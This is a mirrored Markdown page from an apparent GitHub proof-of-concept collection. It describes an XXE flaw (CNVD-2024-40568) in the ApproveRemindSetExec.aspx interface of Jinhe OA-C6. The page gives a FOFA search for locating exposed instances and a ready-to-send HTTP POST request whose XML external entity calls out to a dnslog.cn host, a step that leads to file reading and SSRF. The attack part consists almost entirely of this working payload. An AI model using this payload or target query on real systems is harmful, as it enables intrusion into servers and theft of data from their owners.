mirror of
https://github.com/eeeeeeeeee-code/POC.git
synced 2025-11-07 11:26:58 +00:00
25 lines
823 B
Markdown
25 lines
823 B
Markdown
# 金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞(CNVD-2024-40568)
|
||
|
||
金和OA-C6系统接口ApproveRemindSetExec.aspx存在XXE漏洞,攻击者可利用xxe漏洞获取服务器敏感数据,可读取任意文件以及ssrf攻击,存在一定的安全隐患。
|
||
|
||
## fofa
|
||
|
||
```javascript
|
||
app="金和网络-金和OA"
|
||
```
|
||
|
||
## poc
|
||
|
||
```javascript
|
||
POST /c6/JHSoft.Web.AddMenu/ApproveRemindSetExec.aspx/? HTTP/1.1
|
||
Host:
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
|
||
Accept-Encoding: gzip, deflate
|
||
Accept: */*
|
||
Connection: close
|
||
Content-Type: application/xml
|
||
|
||
<!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://wwwwwwwwwwwwwwww.t07q8o.dnslog.cn"> %remote;]>
|
||
```
|
||
|
||
 |